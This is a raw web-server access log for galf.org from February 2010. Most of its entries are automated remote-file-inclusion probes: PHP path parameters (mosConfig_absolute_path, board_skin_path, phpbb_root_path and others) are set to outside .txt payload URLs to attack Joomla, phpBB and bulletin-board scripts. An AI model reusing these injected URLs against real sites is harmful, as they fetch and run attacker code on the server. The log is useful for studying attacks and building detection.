72.55.191.4 - - [14/Feb/2010:16:33:26 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:33:55 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:34:22 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:34:22 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:34:22 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:34:34 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:34:34 -0800] "GET /logs/access_100125.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:34:34 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:36:12 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:42:10 -0800] "GET /logs/access_100111.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:16:42:29 -0800] "GET /logs/access_100111.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:42:33 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:42:54 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:16:48:25 -0800] "GET /logs/access_100125.log///inc/formmail.inc.php?script_root=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:16:48:25 -0800] "GET /logs///inc/formmail.inc.php?script_root=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:16:48:25 -0800] "GET //inc/formmail.inc.php?script_root=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:16:51:13 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:16:51:13 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.106.241.31 - - [14/Feb/2010:16:51:13 -0800] "GET /logs/access_100201.log%20%20///bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:16:55:34 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:16:55:34 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:16:55:34 -0800] "GET /logs/access_100201.log%20%20///bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
60.234.78.219 - - [14/Feb/2010:16:56:41 -0800] "GET /logs/access.log//delete_comment.php?board_skin_path=http://czerwiensk.com.pl/Cantilena/uploads/news/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.191.4 - - [14/Feb/2010:16:56:50 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.191.4 - - [14/Feb/2010:16:57:17 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:16:57:51 -0800] "GET /logs/access_100201.log%20%20///bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:16:57:51 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [14/Feb/2010:16:57:52 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:16:59:51 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.34.19 - - [14/Feb/2010:16:59:51 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
218.38.34.19 - - [14/Feb/2010:16:59:51 -0800] "GET /?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
218.38.34.19 - - [14/Feb/2010:17:00:20 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:00:20 -0800] "GET /?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:00:20 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:00:33 -0800] "GET /?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
218.38.34.19 - - [14/Feb/2010:17:00:33 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "galf.org"
218.38.34.19 - - [14/Feb/2010:17:00:41 -0800] "GET /logs/access.log%20%20//?path%5Bdocroot%5D=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.115.153 - - [14/Feb/2010:17:02:50 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:17:03:16 -0800] "GET /http://400ml.de/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:17:03:16 -0800] "GET /logs/access_090907.log%20%20/http://400ml.de/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:17:03:16 -0800] "GET /logs/http://400ml.de/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:17:03:24 -0800] "GET /logs/access_091102.log%20%20/http://400ml.de/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:09:45 -0800] "GET /logs/access_100125.log/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:09:45 -0800] "GET /phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:09:45 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.34.19 - - [14/Feb/2010:17:10:13 -0800] "GET /logs/access_100111.log/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.131.106.32 - - [14/Feb/2010:17:11:23 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.32 - - [14/Feb/2010:17:11:25 -0800] "GET /?S=D HTTP/1.0" 200 1032 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:17:11:59 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:17:11:59 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:17:11:59 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:17:13:03 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:17:13:20 -0800] "GET /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:17:13:20 -0800] "GET /logs/access_100111.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
210.114.222.95 - - [14/Feb/2010:17:13:20 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:17:15:30 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:17:15:53 -0800] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:17:15:53 -0800] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:17:15:53 -0800] "GET /logs///appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:17:16:32 -0800] "GET /logs/access_090907.log/http://400ml.de/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.221.130.15 - - [14/Feb/2010:17:16:39 -0800] "GET /logs/access_091102.log/http://400ml.de/wp//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.70.79.113 - - [14/Feb/2010:17:17:50 -0800] "GET /logs/access_100118.log///appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.55.227.145 - - [14/Feb/2010:17:18:38 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:26:59 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:26:59 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:26:59 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:27:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:27:32 -0800] "GET /logs/access_090720.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:27:32 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.132 - - [14/Feb/2010:17:28:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:29:12 -0800] "GET /logs/access_090928.log%20%20//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:29:12 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:29:12 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:29:25 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:29:25 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:29:25 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:29:34 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:29:34 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:17:29:34 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:17:30:17 -0800] "GET /logs/access_090831.log%20%20//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:17:30:17 -0800] "GET /delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:17:30:17 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.124.149.168 - - [14/Feb/2010:17:30:22 -0800] "GET /logs/access_091130.log%20%20//delete_all.php?board_skin_path=http://www.gruppoanima.it/gruppoanima/templates/ja_purity/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:30:42 -0800] "GET /logs/access_100111.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:30:42 -0800] "GET /delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:30:42 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.233.32.134 - - [14/Feb/2010:17:31:35 -0800] "GET /logs/access_100118.log//delete_all.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.132 - - [14/Feb/2010:17:33:03 -0800] "GET /cendoc/?M=D HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:17:42:26 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:17:42:26 -0800] "GET /logs/access_091012.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:17:42:50 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:17:42:50 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:17:42:50 -0800] "GET /logs/access_091012.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.49.120 - - [14/Feb/2010:17:47:04 -0800] "GET /logs/access_091130.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.49.120 - - [14/Feb/2010:17:47:04 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.205.49.120 - - [14/Feb/2010:17:47:04 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [14/Feb/2010:17:57:31 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 3152962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:17:58:52 -0800] "GET /logs/access_100201.log//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:17:58:53 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:17:58:53 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:35 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:35 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:35 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:35 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:17:59:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:00:58 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:01:07 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.141.91.138 - - [14/Feb/2010:18:01:08 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
